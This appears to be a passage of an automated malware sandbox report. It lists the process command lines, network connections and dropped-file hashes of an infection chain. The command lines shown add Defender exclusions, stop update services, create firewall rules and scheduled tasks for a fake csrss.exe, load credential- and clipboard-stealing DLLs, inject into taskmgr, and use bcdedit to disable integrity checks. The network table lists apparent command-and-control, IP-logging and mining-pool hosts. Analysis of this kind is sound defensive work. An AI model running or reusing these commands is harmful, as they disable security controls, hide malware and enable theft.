"C:\Windows\System32\cmd.exe" /c taskkill /im "s6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "s6.exe" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.68.143:443 pastebin.com tcp
DE 148.251.234.93:443 yip.su tcp
US 8.8.8.8:53 flyawayaero.net udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.93.225:443 flyawayaero.net tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
RU 45.8.228.16:80 goboh2b.top tcp
US 188.114.96.0:443 jetpackdelivery.net tcp
NL 13.227.219.25:443 downloads.digitalpulsedata.com tcp
US 104.21.32.208:443 lycheepanel.info tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 172.67.180.173:443 potatogoose.com tcp
NL 88.221.25.169:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.97.0:443 justsafepay.com tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 136.0.77.2:80 link.storjshare.io tcp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 demo.seafile.com udp
RU 5.42.64.10:80 5.42.64.10 tcp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 172.67.222.167:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 link.storjshare.io udp
US 8.8.8.8:53 link.storjshare.io udp
DE 3.5.136.126:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 script.google.com udp
US 8.8.8.8:53 mediasitenews.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
DE 116.203.7.13:80 116.203.7.13 tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 8.8.8.8:53 51df8fab-95bc-4aa8-a109-c86e3d5827bb.uuid.ramboclub.net udp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server3.ramboclub.net udp
US 142.251.125.127:19302 stun1.l.google.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
BG 185.82.216.48:443 server3.ramboclub.net tcp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
BG 185.82.216.48:443 server3.ramboclub.net tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp
US 194.87.32.213:443 mediasitenews.com tcp

Files

memory/2076-0-0x000000013FD90000-0x000000014016E000-memory.dmp

memory/2020-5-0x000000001B340000-0x000000001B622000-memory.dmp

memory/2020-6-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2020-7-0x000007FEF4630000-0x000007FEF4FCD000-memory.dmp

memory/2020-8-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2020-9-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2020-10-0x000007FEF4630000-0x000007FEF4FCD000-memory.dmp

memory/2020-11-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2020-12-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2076-16-0x00000000770E0000-0x0000000077289000-memory.dmp

memory/2668-17-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2668-19-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2020-15-0x000007FEF4630000-0x000007FEF4FCD000-memory.dmp

memory/2076-14-0x000000013FD90000-0x000000014016E000-memory.dmp

memory/2668-13-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2668-20-0x0000000073F20000-0x000000007460E000-memory.dmp

memory/2668-21-0x0000000004B00000-0x0000000004B40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4AC8.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar4AFA.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7cd91e043dcb09c5d65149f7adc36b17
SHA1 b9500ab33b6f7e4c8d62f2f621c896d91f78dcb6
SHA256 7108976ae2319ed56d149d8529a623209d1c8aa1d3be78b04ac7f9525cb7c6db
SHA512 b060701b0f41bbba3b980c35b014b2b27f381758b6d0cd6982615ee4d34a5b17646a9f451e6b6b9f67a8b2bd7d11dcf05e5af47a144cc5a78656a183626c788d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 f624be06efb00e72682fe932c0b4789b
SHA1 43c854836bd9565ca08f6b9c47a732b3df791c47
SHA256 1460d3580d23cca19c24be22999947c2d14c3c906a8cfc497c31607d33c0ae99
SHA512 9c7cb27e0cf244a3f16f098a758404df04e6fd2cf14c16035dd88d3c7e77cdd8bdc21b061dff6cc8a64a8be81f2fefaee2e3d949967d6e0a82a60aaa71ae658c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 d4ae187b4574036c2d76b6df8a8c1a30
SHA1 b06f409fa14bab33cbaf4a37811b8740b624d9e5
SHA256 a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7
SHA512 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\wPMt0uRRbpirsjnCi7YBvIL0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4859ce93eb80c478a6530c2e5dbbf796
SHA1 3c5cb939df078789437c8337cd01c0921f425573
SHA256 052352770d6dc745c2ecbe2aaa6a7c791168ec956dc682a4768725c7b3b62eec
SHA512 62ff4b7386426124f3b9ae507566b2dedefcffe4604b10c3de536fd2aeecd8689ed9019eb7e1e943fc59673bc15cd5f3af74259e9e1990e1ca5972f3cbf59f09

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c9b3af025f3b2782c8fa3f7dc41a1fc4
SHA1 66d6070e7064ed56ff87b15e4b1758f174cb92ce
SHA256 d4ac127f13b49638c06876f9ddf618713740000d14de2043b7ebe6485a834dd6
SHA512 4ef0d6ecdb5793db25553720f0f5614632149c111b339037284556f1c6b60a32addb69c26550e04feb5c598997b25b859edd9ab8ef5f10b63239fc5ef85b9f7a

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

\Users\Admin\Pictures\tmbTrGgEESOC6ai2Qp4cdXBg.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\5zGyTtOhCdrE154HEkNl5ci5.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\iyLl1NDgn29kmwOyBmeudOST.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

memory/2308-256-0x0000000002670000-0x0000000002A68000-memory.dmp

C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\Pictures\t7mVmjrk0ZvD02kvamNTn4XE.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\3LF4sNEp7nkJEysP3BMkGhDb.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\BamDCFN0sRfZmtUQzY0URkun.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
